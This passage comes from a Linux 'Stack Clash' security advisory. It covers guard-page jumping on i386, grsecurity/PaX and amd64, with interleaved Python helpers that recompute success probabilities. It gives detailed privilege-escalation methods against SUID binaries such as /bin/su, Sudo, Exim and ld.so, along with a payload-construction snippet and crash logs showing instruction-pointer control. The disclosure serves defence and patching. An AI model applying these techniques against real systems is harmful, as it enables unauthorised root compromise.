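DT_AUXILIARY = 0x7FFFFFFD


def elf32_dyn(d_tag, d_val):
    """Pack one i386 (little-endian) Elf32_Dyn: int32 d_tag, uint32 d_val."""
    return struct.pack("<iI", d_tag, d_val)


def survives_string_copy(pattern):
    """A string copy stops at the first NUL, so the pattern must not contain one."""
    return b"\x00" not in pattern


# Hypothetical stack address of the attacker's string table: even, so that it
# halves exactly, and chosen so that its half contains no null-byte.
our_strtab = 0xBFA2C4E6
half = our_strtab // 2

needed_entry = elf32_dyn(DT_NEEDED, half)        # 01 00 00 00 ...: contains NULs
auxiliary_entry = elf32_dyn(DT_AUXILIARY, half)  # fd ff ff 7f ...: no NUL

# After the smash, DT_STRTAB.d_ptr and the DT_AUXILIARY d_val both hold
# `half`, so the pathname read by ld.so is located at their sum.
pathname_address = half + half

print(needed_entry.hex(), survives_string_copy(needed_entry))
print(auxiliary_entry.hex(), survives_string_copy(auxiliary_entry))
print(hex(pathname_address))
```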

To solve this second problem, we could overwrite the .dynamic section
with a more complicated pattern that repairs these entries, but our
exploit's probability of success would decrease significantly.

Instead, we take control of ld.so's execution flow as soon as
_dl_map_object_deps() loads our library:

- our library contains three executable LOAD segments,

- but only the first and last segments are sanity-checked by
_dl_map_object_from_fd() and _dl_map_segments(),

- and all segments except the first are mmap()ed with MAP_FIXED by
_dl_map_segments(),

- so we can mmap() our second segment anywhere -- we mmap() it on top of
ld.so's executable segment,

- and return into our own code (instead of ld.so's) as soon as this
second mmap() system-call returns.

Probabilities

The "hwcap" exploit taught us that this ".dynamic" exploit's probability
of success depends on:

- the size of the cushion below the .dynamic section, which can absorb
the excess of "good-write" without crashing: the padding bytes between
the start of the PIE's read-write segment and the start of its first
read-write section;

- the size of the cushion above the .dynamic section, which can absorb
the excess of "good-write" and "bad-write" without crashing: the .got,
.data, and .bss sections.

If we guarantee that (cushion above .dynamic > good-write + bad-write),
then the theoretical probability of success is approximately:

MIN(cushion below .dynamic, good-write) / max stack randomization

The maximum size of the cushion below the .dynamic section is 4KB (one
page) and hence the maximum probability of success is 4KB/8MB=1/2048.
In practice, on Ubuntu 16.04.2:

- the highest probability is 1/2589 (/bin/su) and the lowest probability
is 1/9225 (/usr/lib/eject/dmcrypt-get-device);

- each run uses 1GB of memory and takes 1.5 seconds (on a 4GB Virtual
Machine);

- this ld.so ".dynamic" exploit has a good chance of obtaining a
root-shell after 2589 * 1.5 seconds ~= 1 hour.
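The approximation above and the resulting running time can be evaluated with a few lines of Python. The 64KB good-write is a hypothetical value. `success_probability()` and `expected_hours()` are illustrative helpers that only restate the formulas in the text.

```python
KB = 1 << 10
MB = 1 << 20


def success_probability(cushion_below, good_write, max_stack_rand):
    """MIN(cushion below .dynamic, good-write) / max stack randomization.

    Only meaningful under the text's assumption that the cushion above
    .dynamic is larger than good-write + bad-write.
    """
    return min(cushion_below, good_write) / max_stack_rand


def expected_hours(probability, seconds_per_run):
    """Mean number of runs until the first success (1/p) times the cost of one run."""
    return (1 / probability) * seconds_per_run / 3600


# Best case: a one-page cushion against 8MB of stack randomization
# (the 64KB good-write is hypothetical, and larger than the cushion).
p_max = success_probability(4 * KB, 64 * KB, 8 * MB)
print(f"maximum probability: 1/{1 / p_max:.0f}")

# Measured best case on Ubuntu 16.04.2 (/bin/su): 1/2589 at 1.5 seconds per run.
print(f"/bin/su: ~{expected_hours(1 / 2589, 1.5):.2f} hours")
```

Treating each run as an independent trial is an assumption. Under it, 1/p runs give a probability of at least one success of about 1 - 1/e (roughly 63%), which is one way to read "a good chance".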

========================================================================
IV.1.5. /bin/su
========================================================================

As we were drafting this advisory, we discovered a general method for
completing Step 1 (Clash) of the stack-clash exploitation: the Linux
kernel limits the size of the command-line arguments and environment
variables to 1/4 of the RLIMIT_STACK, but it imposes this limit on the
argument and environment strings, not on the argv[] and envp[] pointers
to these strings (CVE-2017-1000365).

On i386, if we set RLIMIT_STACK to RLIM_INFINITY, the maximum number of
argv[] and envp[] pointers is 1G (1/4 of the RLIMIT_STACK, divided by
1B, the minimum size of an argument or environment string). In theory,
the maximum size of the initial stack is therefore 1G*(1B+4B)=5GB. In
practice, this is enough to exhaust the address-space, and allows us to
clash the stack with the memory region that is mapped below it, without
an application-specific memory leak.
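The 5GB figure follows from the fact that only the strings count against the limit, not the pointers to them. A minimal Python restatement, assuming RLIM_INFINITY behaves like a 4GB limit on i386 (the helper `max_initial_stack()` is hypothetical):

```python
GB = 1 << 30


def max_initial_stack(rlimit_stack, pointer_size, min_string_size=1):
    """Worst-case initial stack when only the strings count against RLIMIT_STACK/4.

    Each string also needs one argv[] or envp[] pointer, which is not counted,
    so the shortest strings (1 byte: an empty string, i.e. its terminating
    null-byte) maximize the total.
    """
    strings_cap = rlimit_stack // 4
    max_pointers = strings_cap // min_string_size
    return max_pointers * (min_string_size + pointer_size)


# Assumption: RLIM_INFINITY on i386 is modeled as a 4GB limit.
print(max_initial_stack(4 * GB, pointer_size=4) // GB, "GB on i386")
```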

This discovery allowed us to write alternative versions of our
stack-clash exploits; for example:

- an ld.so "hwcap" exploit against Ubuntu: we replace the LD_AUDIT
memory leak with 2GB of stack memory (1GB of argument and environment
strings, and 1GB of argv[] and envp[] pointers) and replace the
LD_AUDIT library with an LD_PRELOAD library;

- an ld.so ".dynamic" exploit against systems vulnerable to offset2lib:
we reach the end of the PIE's read-write segment with only 128MB of
stack memory (argument and environment strings and pointers).

These proofs-of-concept demonstrate a general method for completing Step
1 (Clash), but they are much slower than their original versions (10-20
seconds per run) because they pass millions of argv[] and envp[]
pointers to execve().

Moreover, this discovery allowed us to exploit SUID binaries through
general methods that do not depend on application-specific or ld.so
vulnerabilities; if a SUID binary calls setlocale(LC_ALL, ""); and
gettext() (or a derivative such as strerror() or _()), then it is
exploitable:

- Step 1: we clash the stack with the heap through millions of argument
and environment strings and pointers;

- Step 2: we consume the initial stack expansion with 128KB of argument
and environment pointers;

- Step 3: we jump over the stack guard-page and into the heap with the
alloca()tion of the LANGUAGE environment variable in gettext();

- Step 4a: we smash the stack with the malloc()ation of the
OUTPUT_CHARSET environment variable in gettext() and thus gain control
of eip.

For example, we exploited Debian's /bin/su (from the shadow-utils): its
main() function calls setlocale() and save_caller_context(), which calls
gettext() (through _()) if its stdin is not a tty.

Debian 8.5

Debian 8.5 is vulnerable to CVE-2016-3672: we set RLIMIT_STACK to
RLIM_INFINITY and disable ASLR, clash the stack with the heap through
2GB of argument and environment strings and pointers (1GB of strings,
1GB of pointers), and return-into-libc's system() or __libc_dlopen():

- the system() version uses 4GB of memory (2GB in the /bin/su process,
and 2GB in the process fork()ed by system());

- the __libc_dlopen() version uses only 2GB of memory, but ebp must
point to our smashed data on the stack.

Debian 8.6

Debian 8.6 is vulnerable to offset2lib but not to CVE-2016-3672: we must
brute-force the libc's ASLR (8 bits of entropy), but we clash the stack
with the heap through only 128MB of argument and environment strings and
pointers -- this /bin/su exploit can be parallelized.

========================================================================
IV.1.6. Grsecurity/PaX
========================================================================

https://grsecurity.net/

In 2010, grsecurity/PaX introduced a configurable stack guard-page: its
size can be modified through /proc/sys/vm/heap_stack_gap and is 64KB by
default (unlike the hard-coded 4KB stack guard-page in the vanilla
kernel).

Unfortunately, a 64KB stack guard-page is not large enough, and can be
jumped over with ld.so or gettext() (CVE-2017-1000377); for example, we
were able to gain eip control against Sudo, but we were unable to obtain
a root-shell or gain eip control against another application, because
grsecurity/PaX imposes the following security measures:

- it restricts the RLIMIT_STACK of SUID binaries to 8MB, which prevents
us from switching to the legacy bottom-up mmap() layout (Step 1);

- it restricts the argument and environment strings to 512KB, which
prevents us from clashing the stack through megabytes of command-line
arguments and environment variables (Step 1);

- it randomizes the PIE and libraries with 16 bits of entropy (instead
of 8 bits in vanilla), which prevents us from brute-forcing the ASLR
and returning-into-libc (Step 4a);

- it implements /proc/sys/kernel/grsecurity/deter_bruteforce (enabled by
default), which limits the number of SUID crashes to 1 every 15
minutes (all Steps) and makes exploitation impossible.

Sudo

The vulnerability that we discovered in Sudo's get_process_ttyname()
(CVE-2017-1000367) allows us to:

- Step 1: clash the stack with 3GB of heap memory from the filesystem
(directory pathnames) and bypass grsecurity/PaX's 512KB limit on the
argument and environment strings;

- Step 2: consume the 128KB of initial stack expansion with 3MB of
recursive function calls and avoid grsecurity/PaX's 8MB restriction on
the RLIMIT_STACK;

- Step 3: jump over grsecurity/PaX's 64KB stack guard-page with a 128KB
(MAX_ARG_STRLEN) alloca()tion of the LANGUAGE environment variable in
gettext();

- Step 4a: smash the stack with a 128KB (MAX_ARG_STRLEN) malloc()ation
of the OUTPUT_CHARSET environment variable in gettext() -- the
"smashing-chunk" -- and thus gain control of eip.

In Step 1, we nearly exhaust the address-space until finally malloc()
switches from brk() to 1MB mmap()s and reaches the start of the stack
with the very last 1MB mmap() that we allocate. The exact amount of
memory that we must allocate to reach the stack with our last 1MB mmap()
depends on the sum of three random variables: the 256MB randomization of
the stack, the 64MB randomization of the heap, and the 1MB randomization
of the NULL region.

To maximize the probability of jumping over the stack guard-page, into
our last 1MB mmap() below the stack, and overwriting a return-address on
the stack with our smashing-chunk:

- (Step 1) we must allocate the mean amount of memory to reach the stack
with our last 1MB mmap(): the sum of three uniform random variables is
not uniform (https://en.wikipedia.org/wiki/Irwin-Hall_distribution),
but the values within the 256MB-64MB-1MB=191MB plateau at the center
of this bell-shaped probability distribution occur with a uniform and
maximum probability of (1MB*64MB)/(1MB*64MB*256MB)=1/256MB;

- (Step 1) the end of our last 1MB mmap() must be allocated at a
distance within [stack guard-page (64KB), guard-page jump (128KB)]
below the start of the stack: the guard-page jump (Step 3) then lands
at a distance d within [0, guard-page jump - stack guard-page (64KB)]
below the end of our last 1MB mmap();

- (Step 4a) the end of our smashing-chunk must be allocated at the end
of our last 1MB mmap(), above the landing-point of the guard-page
jump: our smashing-chunk then overwrites a return-address on the
stack, below the landing-point of the guard-page jump.
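The plateau claim in the first item above can be checked numerically by convolving discrete uniform distributions. This Python sketch works in 256KB units, an assumption made only to keep it small: the stack, heap, and NULL-region randomizations become 1024, 256, and 4 units, and every value on the flat top of the resulting distribution has probability 1/1024, i.e. 1/256MB in the original units. The discrete plateau is two units wider than the continuous 191MB plateau because its endpoints are included.

```python
def uniform_pmf(n):
    """Discrete uniform distribution over {0, 1, ..., n - 1}."""
    return [1.0 / n] * n


def convolve(p, q):
    """Distribution of the sum of two independent discrete random variables."""
    out = [0.0] * (len(p) + len(q) - 1)
    for i, pi in enumerate(p):
        for j, qj in enumerate(q):
            out[i + j] += pi * qj
    return out


# Randomizations in 256KB units (scaled down to keep the example small):
# stack 256MB = 1024 units, heap 64MB = 256 units, NULL region 1MB = 4 units.
A, B, C = 1024, 256, 4
total = convolve(convolve(uniform_pmf(B), uniform_pmf(C)), uniform_pmf(A))

# Flat top of the bell-shaped distribution: from (B-1)+(C-1) to A-1 inclusive.
plateau = total[(B - 1) + (C - 1):A]
print(len(plateau), "units on the plateau, each with probability", plateau[0])
print("plateau is the maximum:", max(total) == plateau[0] == 1.0 / A)
```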

In theory, this probability is roughly:

SUM(d = 1; d < guard-page jump - stack guard-page; d++) d / (256MB*1MB)

~= ((guard-page jump - stack guard-page)^2 / 2) / (256MB*1MB)

~= 1 / 2^17
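The closed-form approximation can be compared with the exact sum using Python's standard `fractions.Fraction`. The constants are the 64KB guard-page and the 128KB jump quoted in the text:

```python
from fractions import Fraction

KB = 1 << 10
MB = 1 << 20

GUARD_PAGE = 64 * KB    # grsecurity/PaX default stack guard-page
JUMP = 128 * KB         # MAX_ARG_STRLEN alloca() of LANGUAGE in gettext()
n = JUMP - GUARD_PAGE   # the landing distance d ranges over [0, n)
denominator = 256 * MB * 1 * MB

# Exact: SUM(d = 1; d < n; d++) d = n * (n - 1) / 2
exact = Fraction(n * (n - 1) // 2, denominator)
# Approximation used in the text: (n^2 / 2) / (256MB * 1MB)
approx = Fraction(n * n, 2 * denominator)

print("approximation == 1/2^17:", approx == Fraction(1, 2**17))
print("exact / approximation =", float(exact / approx))
```

The exact value is (n-1)/n times the approximation, with n = 64KB, so the two agree to within 0.002%.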

In practice, we tested this Sudo proof-of-concept on an i386 Debian 8.6
protected by the linux-grsec package from the jessie-backports, but we
manually disabled /proc/sys/kernel/grsecurity/deter_bruteforce:

- it uses 3GB of memory, and 800K on-disk inodes;

- it takes 5.5 seconds per run (on a 4GB Virtual Machine);

- it has a good chance of gaining eip control after 2^17 * 5.5 seconds ~=
200 hours; in our test:

PAX: From 192.168.56.1: execution attempt in: <heap>, 1b068000-a100d000 1b068000
PAX: terminating task: /usr/bin/sudo( 1 ):25465, uid/euid: 1000/0, PC: 41414141, SP: b8844f30
PAX: bytes at PC: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
PAX: bytes at SP-4: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141

However, brute-forcing the ASLR to obtain a root-shell would take ~1500
years, which makes exploitation impossible.

Moreover, if we enable /proc/sys/kernel/grsecurity/deter_bruteforce,
gaining eip control would take ~1365 days, and obtaining a root-shell
would take hundreds of thousands of years.
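The durations in the last two paragraphs follow from the figures above. This sketch assumes, as the text implicitly does, that the eip-control and ASLR brute-forces are independent, so that their expected run counts multiply (2^17 * 2^16). It uses 365.25-day years.

```python
HOUR = 3600
DAY = 24 * HOUR
YEAR = 365.25 * DAY

EIP_RUNS = 2**17   # expected runs to gain eip control (estimate above)
ASLR_RUNS = 2**16  # 16 bits of PIE/library entropy under grsecurity/PaX

# deter_bruteforce disabled: 5.5 seconds per run.
eip_hours = EIP_RUNS * 5.5 / HOUR
root_years = EIP_RUNS * ASLR_RUNS * 5.5 / YEAR

# deter_bruteforce enabled: at most one SUID crash every 15 minutes.
eip_days_deter = EIP_RUNS * 15 * 60 / DAY
root_years_deter = EIP_RUNS * ASLR_RUNS * 15 * 60 / YEAR

print(f"eip: ~{eip_hours:.0f} hours, root-shell: ~{root_years:.0f} years")
print(f"with deter_bruteforce: eip ~{eip_days_deter:.0f} days, "
      f"root-shell ~{root_years_deter:,.0f} years")
```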

========================================================================
IV.1.7. 64-bit exploitation
========================================================================

Introduction

The address-space of a 64-bit process is so vast that we initially
thought it was impossible to clash the stack with another memory region;
we were wrong.

Linux's execve() first randomizes the end of the mmap region (which
grows top-down by default) and then randomizes the end of the stack
region (which grows down, on x86). On amd64, the initial mmap-stack
distance (between the end of the mmap region and the end of the stack
region) is minimal when RLIMIT_STACK is lower than or equal to MIN_GAP
(mmap_base() in arch/x86/mm/mmap.c), and then:

- the end of the mmap region is equal to (as calculated by
arch_pick_mmap_layout() in arch/x86/mm/mmap.c):

mmap_end = TASK_SIZE - MIN_GAP - arch_mmap_rnd()

where:

. TASK_SIZE is the highest address of the user-space (0x7ffffffff000)

. MIN_GAP = 128MB + stack_maxrandom_size()

. stack_maxrandom_size() is ~16GB (or ~4GB if the kernel is vulnerable
to CVE-2015-1593, but we do not consider this case here)

. arch_mmap_rnd() is a random variable in the [0B,1TB] range

- the end of the stack region is equal to (as calculated by
randomize_stack_top() in fs/binfmt_elf.c):

stack_end = TASK_SIZE - "stack_rand"

where:

. "stack_rand" is a random variable in the [0, stack_maxrandom_size()]
range

- the initial mmap-stack distance is therefore equal to:

stack_end - mmap_end = MIN_GAP + arch_mmap_rnd() - "stack_rand"

= 128MB + stack_maxrandom_size() - "stack_rand" + arch_mmap_rnd()

= 128MB + StackRand + MmapRand

where:

. StackRand = stack_maxrandom_size() - "stack_rand", a random variable
in the [0B,16GB] range

. MmapRand = arch_mmap_rnd(), a random variable in the [0B,1TB] range
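The derivation can be restated as a Python sketch. The constants are the approximate values quoted above (stack_maxrandom_size() taken as exactly 16GB), not values read from a running kernel. The functions are hypothetical helpers named after the kernel functions they model.

```python
MB = 1 << 20
GB = 1 << 30
TB = 1 << 40

# Values quoted in the text; stack_maxrandom_size() approximated as 16GB.
TASK_SIZE = 0x7FFFFFFFF000
STACK_MAXRANDOM = 16 * GB
MIN_GAP = 128 * MB + STACK_MAXRANDOM


def mmap_end(mmap_rnd):
    """End of the mmap region (arch_pick_mmap_layout(), RLIMIT_STACK <= MIN_GAP)."""
    return TASK_SIZE - MIN_GAP - mmap_rnd


def stack_end(stack_rand):
    """End of the stack region (randomize_stack_top())."""
    return TASK_SIZE - stack_rand


def mmap_stack_distance(stack_rand, mmap_rnd):
    """stack_end - mmap_end = 128MB + StackRand + MmapRand."""
    return stack_end(stack_rand) - mmap_end(mmap_rnd)


# Minimum: maximal stack randomization and no mmap randomization.
print(mmap_stack_distance(STACK_MAXRANDOM, 0) // MB, "MB")
```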

Consequently, the minimum initial mmap-stack distance is only 128MB
(CVE-2017-1000379), and:

- On kernels vulnerable to offset2lib, the heap of a PIE (which is
mapped at the end of the mmap region) is mapped below and close to the
stack with a good probability (~1/700). We can therefore clash the
stack with the heap in Step 1, jump over the stack guard-page and into
the heap in Step 3, and smash the stack with the heap and gain control
of rip in Step 4a (after 6 hours on average). However, because the
addresses of all executable regions contain null-bytes, and because
most of our stack-smashes in Step 4a are string operations (except the
getaddrinfo() method), we were unable to transform such a rip control
into arbitrary code execution.

- On all kernels, either a PIE or ld.so is mapped directly below the
stack with a good probability (~1/17000) -- the end of the PIE's or
ld.so's read-write segment is then equal to the start of the stack
guard-page. We can therefore adapt our ld.so "hwcap" exploit to amd64
and obtain root privileges through most SUID binaries on most Linux
distributions (after 5 hours on average).

Kernels vulnerable to offset2lib, local Exim proof-of-concept

Exim's binary is usually a PIE, mapped at the end of the mmap region;
and the heap, which always grows up and is randomized above the end of
the binary, is therefore randomized above the end of the mmap region
(arch_randomize_brk() in arch/x86/kernel/process.c):

heap_start = mmap_end + "heap_rand"

where "heap_rand" is a random variable in the [0B,32MB] range
(negligible and ignored here). For example, on Debian 8.5:

# cat /proc/"`pidof -s /usr/sbin/exim4`"/maps
...
7fa6410d6000-7fa6411c8000 r-xp 00000000 08:01 14574 /usr/sbin/exim4
7fa6413b4000-7fa6413bd000 rw-p 00000000 00:00 0
7fa6413c5000-7fa6413c7000 rw-p 00000000 00:00 0
7fa6413c7000-7fa6413c9000 r--p 000f1000 08:01 14574 /usr/sbin/exim4
7fa6413c9000-7fa6413d2000 rw-p 000f3000 08:01 14574 /usr/sbin/exim4
7fa6413d2000-7fa6413d7000 rw-p 00000000 00:00 0
7fa641b34000-7fa641b76000 rw-p 00000000 00:00 0 [heap]
7ffdf3e53000-7ffdf3ed6000 rw-p 00000000 00:00 0 [stack]
7ffdf3f3c000-7ffdf3f3e000 r-xp 00000000 00:00 0 [vdso]
7ffdf3f3e000-7ffdf3f40000 r--p 00000000 00:00 0 [vvar]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

To reach the start of the stack with the end of the heap (through the -p
memory leak in Exim) in Step 1 of our stack-clash, we must minimize the
initial heap-stack distance, and hence the initial mmap-stack distance,
and set RLIMIT_STACK to MIN_GAP (~16GB). This limits the size of our -p
argument strings on the stack to 16GB/4=4GB, and because we then leak
the same amount of heap memory through -p, the initial heap-stack
distance must be:

- longer than 4GB (the stack must be able to contain the -p argument
strings);

- shorter than 8GB (the end of the heap must be able to reach the start
of the stack during the -p memory leak).

The initial heap-stack distance (approximately the initial mmap-stack
distance, 128MB + StackRand + MmapRand, but we ignore the 128MB term
here) follows a trapezoidal Irwin-Hall distribution, and the [4GB,8GB]
range is within the first non-uniform area of this trapezoid, so the
probability that the initial heap-stack distance is in this range is:

SUM(d = 4GB; d < 8GB; d++) d / (16GB * 1TB)

= SUM(d = 0; d < 4GB; d++) (4GB + d) / (16GB * 1TB)

= SUM(d = 0; d < 2^32; d++) (2^32 + d) / (2^34 * 2^40)

~= ((2^32)*(2^32) + (2^32)*(2^32) / 2) / (2^74)

~= 3 / 2^11

~= 1 / 682

The probability of gaining rip control after the heap reaches the stack
is ~1/16 (as calculated by a 64-bit version of the small helper program
presented in IV.1.1.), and the final probability of gaining rip control
with our local Exim proof-of-concept is:

(3 / 2^11) * (1/16) ~= 1 / 10922
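The same probabilities can be computed exactly, with the continuous integral in place of the SUM(). This Python sketch uses `fractions.Fraction` in GB units. Like the text, it is valid only on the rising edge of the trapezoid (0 to 16GB).

```python
from fractions import Fraction

# Work in GB units so that the exact rational arithmetic stays small.
GB = Fraction(1)
TB = 1024 * GB
STACK_RANGE = 16 * GB  # StackRand in [0B, 16GB]
MMAP_RANGE = 1 * TB    # MmapRand in [0B, 1TB]


def prob_distance_between(lo, hi):
    """P(lo <= StackRand + MmapRand < hi), continuous approximation.

    Only valid on the rising edge of the trapezoid (0 <= lo <= hi <= 16GB),
    where the density of the sum is d / (16GB * 1TB).
    """
    if not 0 <= lo <= hi <= STACK_RANGE:
        raise ValueError("range outside the rising edge of the trapezoid")
    return (hi * hi - lo * lo) / 2 / (STACK_RANGE * MMAP_RANGE)


p_distance = prob_distance_between(4 * GB, 8 * GB)
p_rip = p_distance * Fraction(1, 16)  # ~1/16 once the heap reaches the stack

print("P(distance in [4GB, 8GB]) =", p_distance, f"(~1/{int(1 / p_distance)})")
print("P(rip control) =", p_rip, f"(~1/{int(1 / p_rip)})")
print(f"expected time at 2 seconds per run: ~{float(2 / p_rip) / 3600:.1f} hours")
```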

On our 8GB Debian 8.7 test machine, this proof-of-concept takes roughly
2 seconds per run, and has a good chance of gaining rip control after
10922 * 2 seconds ~= 6 hours:

# gdb /usr/sbin/exim4 core.6049
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
...
This GDB was configured as "x86_64-linux-gnu".
...
Core was generated by `/usr/sbin/exim4 -p0000000000000000000000000000000000000000000000000000000000000'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:41
41 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
(gdb) x/i $rip
=> 0x7ffab1be7061 <__memcpy_sse2_unaligned+65>: retq
(gdb) x/xg $rsp
0x7ffb9b294a48: 0x4141414141414141

Kernels vulnerable to offset2lib, ld.so ".dynamic" exploit

Since kernels vulnerable to offset2lib map PIEs below and close to the
stack, we tried to adapt our ld.so ".dynamic" exploit to amd64. MIN_GAP
guarantees a minimum distance of 128MB between the theoretical end of
the mmap region and the end of the stack, but the stack then grows down
to store the argument and environment strings, and may therefore occupy
the theoretical end of the mmap region (where nothing has been mapped
yet). Consequently, the end of the mmap region (where the PIE will be
mapped) slides down to the first available address, directly below the
stack guard-page and the initial stack expansion (described in II.3.2.):

7ffbb7e51000-7ffbb7e53000 r-xp 00000000 fd:03 4465810 /tmp/test64
...
7ffbb8053000-7ffbb808c000 rw-p 00002000 fd:03 4465810 /tmp/test64
7ffbb808d000-7ffc180ae000 rw-p 00000000 00:00 0 [heap]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

Note: in this example, the "[stack]" is, again, incorrectly displayed as
the "[heap]" by show_map_vma() (in fs/proc/task_mmu.c).

This layout is ideal for our stack-clash exploits, but poses an
unexpected problem: because the PIE is mapped directly below the stack,
the stack cannot grow anymore, and the only free stack space is the
initial stack expansion (128KB) minus the argv[] and envp[] pointers
(which are stored there, as mentioned in II.3.2.):

- on the one hand, many argv[] and envp[] pointers, and hence many
argument and environment strings, result in a higher probability of
mapping the PIE directly below the stack;

- on the other hand, many argv[] and envp[] pointers consume most of the
initial stack expansion and do not leave enough free stack space for
ld.so to operate.

In practice, we pass 96KB of argv[] pointers to execve(), thus leaving
32KB of free stack space for ld.so, and since the size of a pointer is
8B, and the maximum size of an argument string is 128KB, we also pass
96KB/8B*128KB=1.5GB of argument strings to execve(). The resulting
probability of mapping the PIE directly below the stack is:

SUM(s = 0; s < 1.5GB - 128MB; s++) s / (16GB * 1TB)

~= ((1.5GB - 128MB)^2 / 2) / (16GB * 1TB)

~= 1 / 17331
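The figures in this paragraph chain together as shown in the following Python sketch. It uses the text's constants: 96KB of 8-byte pointers, 128KB (MAX_ARG_STRLEN) strings, and the 16GB and 1TB randomizations.

```python
from fractions import Fraction

KB = 1 << 10
MB = 1 << 20
GB = 1 << 30
TB = 1 << 40

POINTER_BYTES = 96 * KB    # argv[] pointers passed to execve(), leaving 32KB for ld.so
POINTER_SIZE = 8           # amd64
MAX_ARG_STRLEN = 128 * KB  # largest single argument string

argv_strings = (POINTER_BYTES // POINTER_SIZE) * MAX_ARG_STRLEN
s = argv_strings - 128 * MB

# ((1.5GB - 128MB)^2 / 2) / (16GB * 1TB), kept exact with Fraction.
p = Fraction(s * s, 2 * 16 * GB * TB)

print(argv_strings / GB, "GB of argument strings")
print(f"P(PIE directly below the stack) ~= 1/{int(1 / p)}")
print(f"~{int(1 / p) / 3600:.1f} hours at 1 second per run")
```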

On a 4GB Virtual Machine, each run takes 1 second, and 17331 runs take
roughly 5 hours. But this exploit cannot tolerate any additional
uncertainty, and because of the problems discussed in IV.1.4. (null-bytes
in DT_NEEDED, but also in DT_AUXILIARY on 64-bit, etc.), we were unable to
overwrite the .dynamic section with a pattern that does not significantly
decrease this exploit's probability of success.

All kernels, ld.so "hwcap" exploit

Despite this failure, we had an intuition: when the PIE is mapped
directly below the stack, the stack layout should be deterministic --
rsp should point into the 128KB of initial stack expansion, at a 32KB
offset above the start of the stack, and the only entropy should be the
8KB of sub-page randomization within the stack (arch_align_stack() in
arch/x86/kernel/process.c). The following output of our small test
program confirmed this intuition (the fourth field is the distance
between the start of the stack and our main()'s rsp when the PIE is
mapped directly below the stack):

$ grep -w sp test64.out | sort -nk4
sp 0x7ffbc271ff38 -> 28472
sp 0x7ffbb95ccff8 -> 28664
sp 0x7ffbaf062678 -> 30328
sp 0x7ffbb08736e8 -> 30440
sp 0x7ffbbc616d18 -> 32024
sp 0x7ffbc1a0fdb8 -> 32184
sp 0x7ffbb9c28ff8 -> 32760
sp 0x7ffbdbf4c178 -> 33144
sp 0x7ffbb39bc1c8 -> 33224
sp 0x7ffbebb86838 -> 34872

Surprisingly, the output of this test program contained additional
valuable information:

7ffbb7e51000-7ffbb7e53000 r-xp 00000000 fd:03 4465810 /tmp/test64
7ffbb8034000-7ffbb8037000 rw-p 00000000 00:00 0
7ffbb804d000-7ffbb804e000 rw-p 00000000 00:00 0
7ffbb804e000-7ffbb8050000 r--p 00000000 00:00 0 [vvar]
7ffbb8050000-7ffbb8052000 r-xp 00000000 00:00 0 [vdso]
7ffbb8052000-7ffbb8053000 r--p 00001000 fd:03 4465810 /tmp/test64
7ffbb8053000-7ffbb808c000 rw-p 00002000 fd:03 4465810 /tmp/test64
7ffbb808d000-7ffc180ae000 rw-p 00000000 00:00 0 [heap]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

- the distance between the end of the read-execute segment of our test
program and the start of its read-only and read-write segments is
approximately 2MB; indeed, for every ELF on amd64:

$ readelf -a /usr/bin/su | grep -wA1 LOAD
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x00000000000061b4 0x00000000000061b4 R E 200000
LOAD 0x0000000000006888 0x0000000000206888 0x0000000000206888
0x0000000000000798 0x00000000000007d0 RW 200000

$ readelf -a /lib64/ld-linux-x86-64.so.2 | grep -wA1 LOAD
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x000000000001fad0 0x000000000001fad0 R E 200000
LOAD 0x000000000001fb60 0x000000000021fb60 0x000000000021fb60
0x000000000000141c 0x00000000000015e8 RW 200000

- several objects are actually mapped inside this ~2MB hole: [vdso],
[vvar], and two anonymous mappings (7ffbb804d000-7ffbb804e000 and
7ffbb8034000-7ffbb8037000).
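The ~2MB hole can be derived from the readelf output above. This Python sketch assumes 4KB pages and uses the VirtAddr and MemSiz columns of the two LOAD segments. `hole_after_text()` is a hypothetical helper.

```python
PAGE = 0x1000  # assumed 4KB pages


def page_down(x):
    return x & ~(PAGE - 1)


def page_up(x):
    return (x + PAGE - 1) & ~(PAGE - 1)


def hole_after_text(rx_vaddr, rx_memsz, rw_vaddr):
    """Bytes left unmapped between the R E segment and the RW segment.

    Computed at page granularity from the VirtAddr/MemSiz columns of
    readelf; the 0x200000 (2MB) alignment of the LOAD segments is what
    places the RW segment about 2MB above the end of the text.
    """
    return page_down(rw_vaddr) - page_up(rx_vaddr + rx_memsz)


su_hole = hole_after_text(0x0, 0x61B4, 0x206888)
ldso_hole = hole_after_text(0x0, 0x1FAD0, 0x21FB60)
print(hex(su_hole), hex(ldso_hole))
```

Both binaries give 0x1ff000 bytes (2MB minus one page). This matches the gap between the end of /tmp/test64's r-xp mapping (7ffbb7e53000) and the start of its r--p mapping (7ffbb8052000) in the maps output above.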

This discovery allowed us to adapt our ld.so "hwcap" exploit to amd64:

- we choose hardware-capabilities that are small enough to be mapped
inside this ~2MB hole, but large enough to defeat the 8KB sub-page
randomization of the stack;

- we jump over the stack guard-page, and over the read-only and
read-write segments of the PIE, and exploit ld.so as we did on i386.

This exploit's probability of success is therefore 1 when the PIE is
mapped directly below the stack, and its final probability of success is
~1/17331: it takes 1 second per run, and has a good chance of obtaining
a root-shell after 5 hours. Moreover, it works on all kernels: if a SUID
binary is not a PIE, or if the kernel is not vulnerable to offset2lib,
we simply jump over ld.so's read-write segment, instead of the PIE's.
For example, on Fedora 25, when the exploit succeeds and loads our own
library /var/tmp/a (the 7ffbabbef000-7ffbabca7000 mapping contains the
hardware-capabilities that we smash):

55a0c9e8d000-55a0c9e91000 r-xp 00000000 fd:00 112767 /usr/libexec/cockpit-polkit
55a0ca091000-55a0ca093000 rw-p 00004000 fd:00 112767 /usr/libexec/cockpit-polkit
7ffbab603000-7ffbab604000 r-xp 00000000 fd:00 4866583 /var/tmp/a
